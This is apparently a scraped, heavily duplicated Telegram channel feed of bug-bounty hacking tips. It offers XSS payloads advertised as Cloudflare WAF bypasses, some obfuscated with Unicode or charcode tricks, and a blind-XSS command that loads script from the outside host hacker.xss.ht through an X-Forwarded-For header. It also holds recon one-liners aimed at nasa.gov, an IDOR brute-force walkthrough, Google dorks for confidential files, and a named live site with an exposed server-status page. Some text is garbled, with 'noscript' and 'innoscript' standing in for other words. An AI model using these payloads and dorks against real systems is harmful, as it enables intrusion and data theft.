A payload that bypasses Cloudflare WAF
<img/src=x onError="`${x}`;alert(`Hello`);">
<img/src=x onError="`${x}`;alert(`Hello`);">
❤25👍1
This media is not supported in your browser
VIEW IN TELEGRAM
You can now passively enumerate all endpoints of a website with katana. (No need waybackurls)
Example:
echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | tee endpoints
You can then check the status of these endpoints or filter in order to find new vulnerabilities:
Example:
echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | httpx -mc 200 | grep -E '\.(js|php)$' | tee specificEndpoints
Example:
echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | tee endpoints
You can then check the status of these endpoints or filter in order to find new vulnerabilities:
Example:
echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | httpx -mc 200 | grep -E '\.(js|php)$' | tee specificEndpoints
👍11🔥6
When hunting for IDORs during a bug bounty program, consider the following tip:
1. Leverage archive tools: Utilize tools like Wayback Machine or specialized software like Waymore to manually archive and analyze subdomains. This can help uncover hidden or previously accessible endpoints that may now be vulnerable to IDORs.
Example usage:
2. Extract all paths with specific keywords: After identifying potential paths, extract all URLs containing specific keywords, such as "admin" or "manager," to narrow down your search.
Example command:
3. Fuzzing: If you find a suspicious path but it doesn't yield any results, try fuzzing the URL with a wordlist. This can help uncover hidden or unintended parameters.
Example usage:
4. Brute force: If you find a path with a dynamic ID, consider brute-forcing the last digits or numbers. This can help uncover additional sensitive information or functionality.
Example scenario:
By following these steps, you can uncover hidden or unintended IDORs, leading to potential security vulnerabilities and rewards in bug bounty programs.
1. Leverage archive tools: Utilize tools like Wayback Machine or specialized software like Waymore to manually archive and analyze subdomains. This can help uncover hidden or previously accessible endpoints that may now be vulnerable to IDORs.
Example usage:
python3 waymore.py -i sub.target.com -mode U -xcc
2. Extract all paths with specific keywords: After identifying potential paths, extract all URLs containing specific keywords, such as "admin" or "manager," to narrow down your search.
Example command:
cat result.txt | grep "admin"
3. Fuzzing: If you find a suspicious path but it doesn't yield any results, try fuzzing the URL with a wordlist. This can help uncover hidden or unintended parameters.
Example usage:
ffuf -u https://sub.taget.com/promo/offer/1234/FUZZ -mc 200
4. Brute force: If you find a path with a dynamic ID, consider brute-forcing the last digits or numbers. This can help uncover additional sensitive information or functionality.
Example scenario:
Found path: https://sub.taget.com/promo/offer/1234/detailsBrute-force the last 3 digits: 1234
By following these steps, you can uncover hidden or unintended IDORs, leading to potential security vulnerabilities and rewards in bug bounty programs.
🔥14❤3👍3😁1
XSS Tip: If alert() is being converted to ALERT() and you can use Like
onerror="𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(𐂃)')()"
onerror="𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(𐂃)')()"
👍21🔥3❤2
Payload for XSS + SQLi + SSTI/CSTI !
'"><noscript/onload=prompt(5);>{{7*7}}
'"><noscript/onload=prompt(5);>{{7*7}}
❤11👎2👍1
XSS Oneliner
echo "testphp.vulnweb.com" | katana -passive -pss waybackarchive,commoncrawl,alienvault | uro | gf xss | Gxss -p XSSRef | dalfox pipe
subfinder -d testphp.vulnweb.com -silent | katana -passive -pss waybackarchive,commoncrawl,alienvault | uro | gf xss | Gxss -p XSSRef | dalfox pipe
🔥3❤2👍1
Blind XSS In X-Forwarded-For Header
subfinder -d http://target.com | gau | bxss -payload '"><noscript src=https://hacker.xss.ht></noscript>' -header "X-Forwarded-For"
Target
Target : Expect More. Pay Less.
Shop Target online and in-store for everything from groceries and essentials to clothing and electronics. Choose contactless pickup or delivery today.
👍3❤2
🫡Automate Your XSS
#!/bin/bash read TARGET
subfinder -d $TARGET -silent | tee domains.txt cat domains.txt | waybackurls | tee waybackurls.txt
cat waybackurls.txt | dalfox pipe
👍2
New XSS Bypass Cloudflare WAF 🧱
Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
❤13
New Xss Fly Under Radar Cloudflare Bypass 🧱
Payload :
"><input%252bTyPE%25253d"hxlxmj"%252bSTyLe%25253d"display%25253anone%25253b"%252bonfocus%25253d"this.style.display%25253d'block'%25253b%252bthis.onfocus%25253dnull%25253b"%252boNMoUseOVer%25253d"this['onmo'%25252b'useover']%25253dnull%25253beval(String.fromCharCode(99,111,110,102,105,114,109,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))%25253b"%252bAuToFOcus>
Credit -Halim
Payload :
"><input%252bTyPE%25253d"hxlxmj"%252bSTyLe%25253d"display%25253anone%25253b"%252bonfocus%25253d"this.style.display%25253d'block'%25253b%252bthis.onfocus%25253dnull%25253b"%252boNMoUseOVer%25253d"this['onmo'%25252b'useover']%25253dnull%25253beval(String.fromCharCode(99,111,110,102,105,114,109,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))%25253b"%252bAuToFOcus>
Credit -Halim
👍23
📢a XSS payload, Cuneiform-alphabet based !
This payload was on trend back in 2020, but it still works :)
𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟]𒁹")()
(Cuneiform is a logo-syllabic noscript that was used to write several languages of the Ancient Near East. The noscript was in active use from the early Bronze Age until the beginning of the Common Era. It is named for the characteristic wedge-shaped impressions (Latin: cuneus) which form its signs.)
Source - Wikipedia
This payload was on trend back in 2020, but it still works :)
𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟]𒁹")()
(Cuneiform is a logo-syllabic noscript that was used to write several languages of the Ancient Near East. The noscript was in active use from the early Bronze Age until the beginning of the Common Era. It is named for the characteristic wedge-shaped impressions (Latin: cuneus) which form its signs.)
Source - Wikipedia
❤4👍1😁1
Google Dork - Sensitive Docs 📄
ext:txt | ext:pdf | ext:xml | ext:xls | ext:xlsx | ext:ppt | ext:pptx | ext:doc | ext:docx
intext:“confidential” | intext:“Not for Public Release” | intext:”internal use only” | intext:“do not distribute”
ext:txt | ext:pdf | ext:xml | ext:xls | ext:xlsx | ext:ppt | ext:pptx | ext:doc | ext:docx
intext:“confidential” | intext:“Not for Public Release” | intext:”internal use only” | intext:“do not distribute”
👍7🔥2
Google Dork - Server Errors ⚡
inurl:"error" | innoscript:"exception" | innoscript:"failure" | innoscript:"server at" | inurl:exception | "database error" | "SQL syntax" | "undefined index" | "unhandled exception" | "stack trace" site:example[.]com
inurl:"error" | innoscript:"exception" | innoscript:"failure" | innoscript:"server at" | inurl:exception | "database error" | "SQL syntax" | "undefined index" | "unhandled exception" | "stack trace" site:example[.]com
👍2
Google Dork - High % keywords 🚀
inurl:conf | inurl:env | inurl:cgi | inurl:bin | inurl:etc | inurl:root | inurl:sql | inurl:backup | inurl:admin | inurl:php site:example[.]com
inurl:conf | inurl:env | inurl:cgi | inurl:bin | inurl:etc | inurl:root | inurl:sql | inurl:backup | inurl:admin | inurl:php site:example[.]com
👍3
https://youtu.be/cfs5pWh5jqM?si=pEyqVQ6SctrnzI7C
DM For Live Class Enrollment
https://wa.me/918945971332
DM For Live Class Enrollment
https://wa.me/918945971332
YouTube
Bug Bounty Live Class | Bug Bounty Automation & Recon | Enroll Now https://wa.me/918945971332
In this Live Class I have talked about how to approach a target in automation and manual way. Usage of the automation in large scope and how to focus on single website for manual pentesting. Have talked about tools like nuclei, gau, httpx, anew, secretfinder…
❤2👍1
Dork: Apache Server Leakage
Reference: https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a
Vulnerable Site- https://www.itronot.co.il/server-status
inurl:server-status "apache server status" "cpu usage"
Reference: https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a
Vulnerable Site- https://www.itronot.co.il/server-status
❤3🔥1